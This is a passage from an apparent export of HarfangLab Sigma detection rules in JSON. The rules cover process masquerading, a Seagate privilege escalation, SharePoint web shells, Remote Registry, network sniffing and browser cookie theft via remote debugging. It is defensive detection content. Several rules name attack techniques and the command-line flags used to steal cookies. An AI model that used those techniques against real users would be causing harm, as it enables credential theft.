ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=* ProfileControl=Off MaxRequestThreads=16'\n - '%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=* ProfileControl=Off MaxRequestThreads=16'\n\n condition: ((selection_svchost and not filter_parent_svchost) or\n (selection_spoolsv and not filter_parent_spoolsv) or\n (selection_taskhost and not filter_parent_taskhost) or\n (selection_userinit and not filter_parent_userinit) or\n (selection_services and not filter_parent_services) or\n (selection_logonui and not filter_parent_logonui) or\n (selection_lsass and not filter_parent_lsass and not filter_lsass_werfault) or\n (selection_winlogon and not filter_parent_winlogon) or\n (selection_wininit and not filter_parent_wininit) or\n (selection_csrss and not filter_parent_csrss) or\n (selection_fontdrvhost and not 
filter_parent_fontdrvhost) or\n (selection_dwm and not filter_parent_dwm) or\n (selection_smss and not filter_parent_smss)) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "65f9250c-0a9d-4f2d-bfe1-cc6b130418aa",
"rule_name": "Suspicious Parent Process for Windows Common Process",
"rule_description": "Detects the execution of a system process with an unexpected parent process.\nThis is likely an attempt at masquerading as a system process and it is often the result of a process injection.\nIt is recommended to investigate the child and parent processes to look for malicious content, actions, or signs of injection.\n",
"rule_creation_date": "2021-05-25",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1036",
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "660da61b-96b8-4b11-af8c-ee0ae90ed158",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609846Z",
"creation_date": "2026-03-23T11:45:34.609849Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609857Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.x86matthew.com/view_post?id=windows_seagate_lpe",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_possible_seagate_media_sync_exploitation.yml",
"content": "title: Possible Seagate Media Sync Local Privilege Escalation Detected\nid: 660da61b-96b8-4b11-af8c-ee0ae90ed158\ndescription: |\n Detects the connection to a Seagate Media Sync Named Pipe by a suspicious process, allowing an attacker to perform privilege escalation.\n This vulnerability has been assigned CVE-2022-40286 and can allow attackers to escalate privileges to SYSTEM.\n It is recommended to investigate the machine's timeline for any other suspicious behavior.\nreferences:\n - https://www.x86matthew.com/view_post?id=windows_seagate_lpe\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/09/26\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1068\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Exploit.CVE-2022-40286\n - classification.Windows.Exploit.SeagateMediaSync\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName: '\\MEDIA_AGGRE_PIPE.PIP'\n\n filter_seagate:\n ProcessSignature: 'Seagate Technology LLC'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "660da61b-96b8-4b11-af8c-ee0ae90ed158",
"rule_name": "Possible Seagate Media Sync Local Privilege Escalation Detected",
"rule_description": "Detects the connection to a Seagate Media Sync Named Pipe by a suspicious process, allowing an attacker to perform privilege escalation.\nThis vulnerability has been assigned CVE-2022-40286 and can allow attackers to escalate privileges to SYSTEM.\nIt is recommended to investigate the machine's timeline for any other suspicious behavior.\n",
"rule_creation_date": "2022-09-26",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "661b1467-fbc7-47f7-938e-e8e67f883109",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073432Z",
"creation_date": "2026-03-23T11:45:34.073434Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073439Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1505_003_suspicious_aspx_creation_sharepoint.yml",
"content": "title: Suspicious File Created by Sharepoint Server\nid: 661b1467-fbc7-47f7-938e-e8e67f883109\ndescription: |\n Detects the creation of suspicious files by Sharepoint Server.\n Attackers may deploy web shells in default IIS folders to execute commands or as a persistence mechanism.\n It is recommended to investigate the content of the created file to determine its legitimacy.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2025/07/22\nmodified: 2025/10/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.003\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection_file:\n Kind: 'create'\n Path|endswith:\n - '.aspx'\n - '.asp'\n - '.ashx'\n - '.asmx'\n - '.ascx'\n - '.asax'\n\n selection_app_sharepoint:\n - ProcessCommandLine|contains: 'sharepoint'\n ProcessName: 'w3wp.exe'\n - ProcessParentCommandLine|contains: 'sharepoint'\n ProcessParentName: 'w3wp.exe'\n - ProcessGrandparentCommandLine|contains: 'sharepoint'\n ProcessGrandparentName: 'w3wp.exe'\n\n exclusion_path:\n Path:\n - '?:\\inetpub\\wwwroot\\wss\\VirtualDirectories\\\\*\\global.asax'\n - '?:\\inetpub\\wwwroot\\wss\\VirtualDirectories\\\\*\\_trust\\Default.aspx'\n - '?:\\Windows\\Temp\\\\*'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "661b1467-fbc7-47f7-938e-e8e67f883109",
"rule_name": "Suspicious File Created by Sharepoint Server",
"rule_description": "Detects the creation of suspicious files by Sharepoint Server.\nAttackers may deploy web shells in default IIS folders to execute commands or as a persistence mechanism.\nIt is recommended to investigate the content of the created file to determine its legitimacy.\n",
"rule_creation_date": "2025-07-22",
"rule_modified_date": "2025-10-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6624dc1b-2cc0-4936-b502-8f6ec161ba8e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621778Z",
"creation_date": "2026-03-23T11:45:34.621780Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621784Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.compass-security.com/2022/05/bloodhound-inner-workings-part-3/",
"https://car.mitre.org/analytics/CAR-2014-11-005/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_remote_registry_enabled_scm.yml",
"content": "title: Remote Registry Service Enabled via SCM\nid: 6624dc1b-2cc0-4936-b502-8f6ec161ba8e\ndescription: |\n Detects when the Remote Registry Service is enabled via the Service Control Manager.\n This service is disabled by default on workstations (starting with Windows 8) and enabled on servers.\n An adversary can remotely manipulate the registry of another machine if the Remote Registry service is enabled and valid credentials are obtained.\n It can be used by an attacker to prepare a Lateral Movement technique, discover the configuration of a host, achieve persistence, or anything that aids an adversary in achieving their objective.\n It is recommended to analyze the authentications and network activity around this alert to determine the user and host responsible for this action and to determine whether this action is legitimate.\nreferences:\n - https://blog.compass-security.com/2022/05/bloodhound-inner-workings-part-3/\n - https://car.mitre.org/analytics/CAR-2014-11-005/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2025/08/04\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Service\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: service\ndetection:\n selection:\n AgentVersion|gte|version: 4.9.0\n ServiceName: 'RemoteRegistry'\n OperationType: 'change'\n\n filter_disabled:\n ServiceStartType: 4\n\n filter_remote:\n # Remote operations contain no information about the context thus are impossible to whitelist\n IsRemote: 'true'\n\n filter_services_local:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n IsRemote: 'false'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k 
GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccm:\n ProcessGrandparentImage:\n - '?:\\Windows\\CCM\\TSManager.exe'\n - '?:\\Windows\\CCM\\Ccm32BitLauncher.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_trendmicro:\n ProcessOriginalFileName: 'housecall.ATTK.exe'\n ProcessSignature: 'Trend Micro, Inc.'\n\n exclusion_ivanti:\n ProcessAncestors|contains:\n - '?:\\Program Files\\Ivanti\\EPM Agent\\SWD\\sdistbat.exe|?:\\Program Files\\Ivanti\\EPM Agent\\SWD\\SDCLIENT.EXE'\n - '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\sdistbat.exe|?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\SDCLIENT.EXE'\n\n exclusion_exchange:\n - ProcessOriginalFileName:\n - 'ExSetupUI.exe'\n - 'ExSetup.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n - ProcessImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n ProcessParentOriginalFileName: 'QuietExe.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6624dc1b-2cc0-4936-b502-8f6ec161ba8e",
"rule_name": "Remote Registry Service Enabled via SCM",
"rule_description": "Detects when the Remote Registry Service is enabled via the Service Control Manager.\nThis service is disabled by default on workstations (starting with Windows 8) and enabled on servers.\nAn adversary can remotely manipulate the registry of another machine if the Remote Registry service is enabled and valid credentials are obtained.\nIt can be used by an attacker to prepare a Lateral Movement technique, discover the configuration of a host, achieve persistence, or anything that aids an adversary in achieving their objective.\nIt is recommended to analyze the authentications and network activity around this alert to determine the user and host responsible for this action and to determine whether this action is legitimate.\n",
"rule_creation_date": "2025-08-04",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "664cd2df-1afc-49fd-9f6c-211ad8f00f7d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087660Z",
"creation_date": "2026-03-23T11:45:34.087662Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087666Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/fdb6cdb7c66b8164aefb57c4ff88e594f0bae068/atomics/T1040/T1040.md#atomic-test-1---packet-capture-linux-using-tshark-or-tcpdump",
"https://attack.mitre.org/techniques/T1040/"
],
"name": "t1040_network_sniffing_tcpdump.yml",
"content": "title: Network Sniffed via tcpdump (Linux)\nid: 664cd2df-1afc-49fd-9f6c-211ad8f00f7d\ndescription: |\n Detects the execution of tcpdump, a command-line utility used to capture and analyze network traffic.\n Adversaries can use tcpdump to sniff the network traffic and capture information about an environment, including authentication materials passed over the network.\n It is recommended to investigate the context of the execution to determine if this action was legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/fdb6cdb7c66b8164aefb57c4ff88e594f0bae068/atomics/T1040/T1040.md#atomic-test-1---packet-capture-linux-using-tshark-or-tcpdump\n - https://attack.mitre.org/techniques/T1040/\ndate: 2022/12/26\nmodified: 2025/10/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Tcpdump\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/tcpdump'\n\n exclusion_qualys:\n GrandparentImage: '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n\n exclusion_thumbnail:\n GrandparentCommandLine: '/usr/bin/python3.6 /opt/vdcm/bin/vdcm-get-thumbnail'\n\n exclusion_cron:\n Ancestors|contains: '|/usr/sbin/crond|'\n\n exclusion_timeout:\n ParentImage: '/usr/bin/timeout'\n\n exclusion_containers:\n Ancestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/sbin/containerd-shim-runc-v2|'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "664cd2df-1afc-49fd-9f6c-211ad8f00f7d",
"rule_name": "Network Sniffed via tcpdump (Linux)",
"rule_description": "Detects the execution of tcpdump, a command-line utility used to capture and analyze network traffic.\nAdversaries can use tcpdump to sniff the network traffic and capture information about an environment, including authentication materials passed over the network.\nIt is recommended to investigate the context of the execution to determine if this action was legitimate.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2025-10-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1040"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "666092ca-01b6-41c8-ba46-d9e6b01af49a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077889Z",
"creation_date": "2026-03-23T11:45:34.077891Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077895Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/wunderwuzzi23/firefox-cookiemonster",
"https://embracethered.com/blog/posts/2020/firefox-cookie-debug-client/",
"https://redcanary.com/blog/threat-intelligence/google-chrome-app-bound-encryption/",
"https://spycloud.com/blog/infostealers-bypass-new-chrome-security-feature/",
"https://mango.pdf.zone/stealing-chrome-cookies-without-a-password",
"https://attack.mitre.org/techniques/T1539/"
],
"name": "t1539_cursed_cookies_firefox.yml",
"content": "title: Possible Attempt to Steal Firefox Cookies via Remote Debugging\nid: 666092ca-01b6-41c8-ba46-d9e6b01af49a\ndescription: |\n Detects Firefox being launched with a remote debugging port and a headless option.\n This allows an attacker to subsequently issue requests to the Firefox application and retrieve user cookies; they are decrypted by Firefox itself and sent through the debug port.\n This particular technique is usually used in conjunction with the Firefox Cookiemonster program that issues the correct API requests to the Firefox browser.\n While a YARA rule has also been made for that specific binary, these commands could also be issued through different means.\n More information about the commands is in the GitHub code mentioned in the references, which is quite simple; investigation could be done through the network packets sent through the debug port.\n Possible false positive information is also included at the bottom of this rule.\n It is recommended to analyze the context around the execution of Firefox to determine if it was executed by or in the context of a suspicious binary.\nreferences:\n - https://github.com/wunderwuzzi23/firefox-cookiemonster\n - https://embracethered.com/blog/posts/2020/firefox-cookie-debug-client/\n - https://redcanary.com/blog/threat-intelligence/google-chrome-app-bound-encryption/\n - https://spycloud.com/blog/infostealers-bypass-new-chrome-security-feature/\n - https://mango.pdf.zone/stealing-chrome-cookies-without-a-password\n - https://attack.mitre.org/techniques/T1539/\ndate: 2023/03/30\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n Image|endswith: '\\firefox.exe'\n CommandLine|contains|all:\n - 
'-start-debugger-server'\n - '-headless'\n\n exclusion_intellij_wsl:\n Ancestors|contains: '|?:\\Windows\\System32\\wsl.exe|?:\\Program Files\\JetBrains\\IntelliJ IDEA*\\bin\\idea64.exe|'\n\n exclusion_node:\n Ancestors|contains: '|?:\\Program Files\\nodejs\\node.exe|'\n\n condition: selection and not 1 of exclusion_*\nfalsepositives:\n - \"The default Firefox port for debugging is 9222; this may be used by web developers but might be indicative of an attacker trying to disguise themselves as a legitimate user.\"\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "666092ca-01b6-41c8-ba46-d9e6b01af49a",
"rule_name": "Possible Attempt to Steal Firefox Cookies via Remote Debugging",
"rule_description": "Detects Firefox being launched with a remote debugging port and a headless option.\nThis allows an attacker to subsequently issue requests to the Firefox application and retrieve user cookies; they are decrypted by Firefox itself and sent through the debug port.\nThis particular technique is usually used in conjunction with the Firefox Cookiemonster program that issues the correct API requests to the Firefox browser.\nWhile a YARA rule has also been made for that specific binary, these commands could also be issued through different means.\nMore information about the commands is in the GitHub code mentioned in the references, which is quite simple; investigation could be done through the network packets sent through the debug port.\nPossible false positive information is also included at the bottom of this rule.\nIt is recommended to analyze the context around the execution of Firefox to determine if it was executed by or in the context of a suspicious binary.\n",
"rule_creation_date": "2023-03-30",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "66612dcf-97ff-48d8-a464-e0da524154d2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613331Z",
"creation_date": "2026-03-23T11:45:34.613335Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613343Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.kali.org/tools/arp-scan/",
"https://linux.die.net/man/1/arp-scan",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/techniques/T1046/"
],
"name": "t1018_arp_scan_linux.yml",
"content": "title: Arp-scan Execution\nid: 66612dcf-97ff-48d8-a464-e0da524154d2\ndescription: |\n Detects the execution of arp-scan, a tool used to discover and map local network hosts using the ARP protocol.\n ARP (Address Resolution Protocol) is a network protocol that maps IP addresses to MAC (physical) addresses on a local network.\n While legitimate for network administration, attackers commonly use this tool during reconnaissance to enumerate potential targets and understand network topology without generating TCP/UDP traffic.\n It is recommended to investigate unauthorized arp-scan usage, correlate with other network discovery activities, and review affected network segments while identifying the source system of scanning attempts.\nreferences:\n - https://www.kali.org/tools/arp-scan/\n - https://linux.die.net/man/1/arp-scan\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/techniques/T1046/\ndate: 2022/12/23\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - attack.t1046\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Tool.ArpScan\n - classification.Linux.Behavior.NetworkScan\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/arp-scan'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "66612dcf-97ff-48d8-a464-e0da524154d2",
"rule_name": "Arp-scan Execution",
"rule_description": "Detects the execution of arp-scan, a tool used to discover and map local network hosts using the ARP protocol.\nARP (Address Resolution Protocol) is a network protocol that maps IP addresses to MAC (physical) addresses on a local network.\nWhile legitimate for network administration, attackers commonly use this tool during reconnaissance to enumerate potential targets and understand network topology without generating TCP/UDP traffic.\nIt is recommended to investigate unauthorized arp-scan usage, correlate with other network discovery activities, and review affected network segments while identifying the source system of scanning attempts.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1046"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "666add95-2a14-413a-8118-e37d63ce67e7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079984Z",
"creation_date": "2026-03-23T11:45:34.079986Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079990Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/BishopFox/sliver/wiki/Cursed",
"https://github.com/mandatoryprogrammer/CursedChrome",
"https://mango.pdf.zone/stealing-chrome-cookies-without-a-password",
"https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/",
"https://null-byte.wonderhowto.com/how-to/analyze-web-browser-extensions-for-possible-malware-other-malicious-activity-0236335/",
"https://attack.mitre.org/techniques/T1539/"
],
"name": "t1539_cursed_cookies_chrome.yml",
"content": "title: Possible Attempt to Steal Chrome Cookies via Remote Debugging\nid: 666add95-2a14-413a-8118-e37d63ce67e7\ndescription: |\n This rule detects Chrome being launched with a remote debugging port and a user data directory option pointed to a Chrome's User Data or Debug directory.\n This allows an attacker to subsequently issue requests to the Chrome application and retrieve user cookies, they will be decrypted by Chrome itself and sent through the Debug Port.\n This technique is usually accompanied by adding the Cursed Chrome extension to the browser, it is recommended to investigate extensions present on the browser.\n A guide is present in the references.\n False Positive may happen in one of these cases below:\n - The default Chrome port for debugging is 9222, this may be used by Web Developers but might be indicative of an attacker trying to disguise as a legitimate user.\n - When this technique is used, the --user-data-dir or --headless options are used, but these may not be necessary if it is executed through PowerShell.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://github.com/BishopFox/sliver/wiki/Cursed\n - https://github.com/mandatoryprogrammer/CursedChrome\n - https://mango.pdf.zone/stealing-chrome-cookies-without-a-password\n - https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/\n - https://null-byte.wonderhowto.com/how-to/analyze-web-browser-extensions-for-possible-malware-other-malicious-activity-0236335/\n - https://attack.mitre.org/techniques/T1539/\ndate: 2023/03/24\nmodified: 2025/04/18\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_image:\n Image|endswith: '\\chrome.exe'\n\n 
